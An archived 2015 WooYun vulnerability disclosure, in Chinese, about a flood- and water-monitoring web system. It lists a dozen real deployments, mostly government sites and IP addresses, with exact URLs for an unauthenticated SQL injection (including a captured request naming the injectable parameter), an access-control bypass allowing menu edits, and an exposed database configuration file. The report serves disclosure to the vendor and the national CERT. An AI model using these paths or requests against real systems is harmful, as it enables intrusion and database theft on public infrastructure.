乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-24: 细节已通知厂商并且等待厂商处理中 2015-03-02: 厂商已经确认,细节仅向厂商公开 2015-03-05: 细节向第三方安全合作伙伴开放 2015-04-26: 细节向核心白帽子及相关领域专家公开 2015-05-06: 细节向普通白帽子公开 2015-05-16: 细节向实习白帽子公开 2015-05-31: 细节向公众公开
RT越权+sql注入+敏感信息泄露
官网:
http://www.strongsoft.net/DMenu.aspx
案例:
http://shzh.wlfx.gov.cnhttp://218.86.6.48:3505http://yj.yywater.gov.cnhttp://222.216.218.28:8088http://219.159.102.99:8088http://218.86.96.98:3505http://111.12.51.221:8088 http://222.242.107.62:4000http://fxb.lucheng.gov.cnhttp://183.233.205.85:9001 http://222.83.214.58:8088http://219.159.239.96:8088
#SQL注入漏洞文件:
/report/ReportMain.aspx
http://shzh.wlfx.gov.cn/report/ReportMain.aspxhttp://218.86.6.48:3505/report/ReportMain.aspxhttp://yj.yywater.gov.cn/report/ReportMain.aspxhttp://222.216.218.28:8088/report/ReportMain.aspxhttp://219.159.102.99:8088/report/ReportMain.aspxhttp://218.86.96.98:3505/report/ReportMain.aspxhttp://111.12.51.221:8088/report/ReportMain.aspxhttp://222.242.107.62:4000//report/ReportMain.aspxhttp://fxb.lucheng.gov.cn/report/ReportMain.aspxhttp://183.233.205.85:9001/report/ReportMain.aspxhttp://222.83.214.58:8088/report/ReportMain.aspxhttp://219.159.239.96:8088/report/ReportMain.aspx
该页面存在可以越权访问,并且存在SQL注入。
抓包:
GET http://222.83.214.58:8088/report/AjaxHandle/StationChoose/StationTree.ashx?STTP=%27KKK%27,%27DD%27,%27DD_R%27,%27PP%27,%27RR%27,%27MM%27,%27ZQ%27,%27ZQ_R%27,%27RR_R%27,%27TT_R%27,%27TT%27&ADCD=&search=1&RadioType=Radio_QY&ReportID=Report11&_=1423816421920 HTTP/1.1Host: 222.83.214.58:8088Proxy-Connection: keep-aliveAccept: application/json, text/javascript, */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Referer: http://222.83.214.58:8088/report/ReportMain.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=lgucng45mk2mwf45oc1zdiuz; CheckCode=PR46
可以脱裤。#越权:漏洞文件:
/MenuManagement/MenuMain.aspx
可以任意添加删除实例:
http://shzh.wlfx.gov.cn/MenuManagement/MenuMain.aspxhttp://218.86.6.48:3505/MenuManagement/MenuMain.aspxhttp://yj.yywater.gov.cn/MenuManagement/MenuMain.aspxhttp://222.216.218.28:8088/MenuManagement/MenuMain.aspxhttp://219.159.102.99:8088/MenuManagement/MenuMain.aspxhttp://218.86.96.98:3505/MenuManagement/MenuMain.aspxhttp://111.12.51.221:8088/MenuManagement/MenuMain.aspxhttp://222.242.107.62:4000//MenuManagement/MenuMain.aspxhttp://fxb.lucheng.gov.cn/MenuManagement/MenuMain.aspxhttp://183.233.205.85:9001/MenuManagement/MenuMain.aspx http://222.83.214.58:8088/MenuManagement/MenuMain.aspxhttp://219.159.239.96:8088/MenuManagement/MenuMain.aspx
#数据库配置文件泄露漏洞文件:
/Config/DataSetConfig%23.xml
实例:
http://shzh.wlfx.gov.cn/Config/DataSetConfig%23.xmlhttp://218.86.6.48:3505/Config/DataSetConfig%23.xmlhttp://yj.yywater.gov.cn/Config/DataSetConfig%23.xmlhttp://222.216.218.28:8088/Config/DataSetConfig%23.xmlhttp://219.159.102.99:8088/Config/DataSetConfig%23.xmlhttp://218.86.96.98:3505/Config/DataSetConfig%23.xmlhttp://111.12.51.221:8088/Config/DataSetConfig%23.xmlhttp://222.242.107.62:4000//Config/DataSetConfig%23.xmlhttp://fxb.lucheng.gov.cn/Config/DataSetConfig%23.xmlhttp://183.233.205.85:9001/Config/DataSetConfig%23.xmlhttp://222.83.214.58:8088/Config/DataSetConfig%23.xmlhttp://219.159.239.96:8088/Config/DataSetConfig%23.xml
程序员懂。
危害等级:高
漏洞Rank:11
确认时间:2015-03-02 16:01
CNVD确认所述情况,已经转由CNCERT下发给福建分中心,由其后续协调网站管理单位处置。
暂无